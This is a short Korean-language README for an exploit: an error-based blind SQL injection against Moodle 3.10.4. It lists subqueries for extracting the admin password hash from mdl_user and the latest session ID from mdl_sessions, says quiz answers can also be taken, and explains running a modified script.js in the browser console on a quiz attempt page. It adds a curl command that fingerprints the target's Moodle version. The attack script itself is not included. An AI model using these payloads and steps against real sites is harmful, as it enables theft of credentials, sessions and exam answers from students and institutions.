
Moodle 3.10.4를 위한 비트 시프트 방식을 사용한 오류 기반 블라인드 SQL 인젝션
Moodle 3.10.4용 비트 시프트 방식을 사용한 오류 기반 블라인드 SQL 인젝션.
공격자가 임의의 데이터베이스 쿼리를 실행할 수 있습니다. 예를 들어 다음을 탈취할 수 있습니다:
데이터베이스의 시험 답안
script.js 파일을 수정하고 /mod/quiz/attempt.php?attempt=...&cmid=... 경로에서 실행하세요.
사용자 비밀번호 해시:
(SELECT password FROM mdl_user WHERE id = 2 LIMIT 1)
사용자 세션:
(SELECT sid FROM mdl_sessions ORDER BY id DESC LIMIT 1)
로그인되어 있고 최소한 하나의 강좌에 등록되어 있어야 합니다. 그런 다음 script.js 코드를 브라우저 콘솔에 복사하고 취약한 버전의 Moodle이 설치된 웹사이트에서 실행하세요.
DOMAIN="example.com"
curl -s https://$DOMAIN/lib/upgrade.txt | head